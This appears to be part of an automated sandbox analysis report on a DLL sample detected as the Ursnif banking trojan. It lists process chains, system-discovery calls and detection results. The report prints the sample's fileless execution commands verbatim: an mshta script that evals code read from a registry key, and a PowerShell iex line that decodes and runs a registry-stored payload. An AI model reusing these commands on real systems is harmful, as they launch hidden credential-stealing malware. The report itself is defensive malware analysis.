Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8EBB6 cpuid 0_2_6DD8EBB6
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6DD41E8A
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6DD41144
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04614454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_04614454
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDB1C7E _free,GetTimeZoneInformation,_free, 0_2_6DDB1C7E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD41F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6DD41F10
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Remote Access Functionality:

Yara detected Ursnif